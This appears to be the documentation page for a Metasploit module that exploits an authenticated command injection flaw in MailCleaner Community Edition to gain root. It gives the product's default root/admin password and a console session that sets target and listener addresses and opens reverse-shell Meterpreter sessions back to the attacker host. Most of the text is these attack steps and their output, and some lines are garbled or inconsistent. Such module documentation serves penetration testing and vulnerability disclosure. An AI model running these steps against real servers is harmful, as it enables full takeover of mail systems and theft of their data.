Mehmet İnce
1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.
You can download ISO file from following URL. https://www.mailcleaner.org/latest-downloads/
At the time of this writing all the passwords of users such as root or admin user was "MCPassw0rd".
Verification Steps
A successful check of the exploit will look like this:
- Start
msfconsole use use exploit/linux/http/mailcleaner- Set
RHOST - Set
LHOST - Set
USERNAME - Set
PASSWORD - Run
exploit - Verify that you are seeing
Awesome..! Authenticated. - Verify that you are getting
meterpretersession.
Scenarios
msf5 > use exploit/linux/http/mailcleaner_exec
msf5 exploit(linux/http/mailcleaner_exec) > set RHOSTS 12.0.0.100
RHOSTS => 12.0.0.100
msf5 exploit(linux/http/mailcleaner_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(linux/http/mailcleaner_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(linux/http/mailcleaner_exec) > set PASSWORD <password>
PASSWORD => qwe123
msf5 exploit(linux/http/mailcleaner_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:<password>
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.100:44974) at 2018-12-19 17:24:44 +0300
[*] Sending stage (53508 bytes) to 12.0.0.100
[*] Meterpreter session 2 opened (12.0.0.1:4444 -> 12.0.0.100:44975) at 2018-12-19 17:24:45 +0300
meterpreter >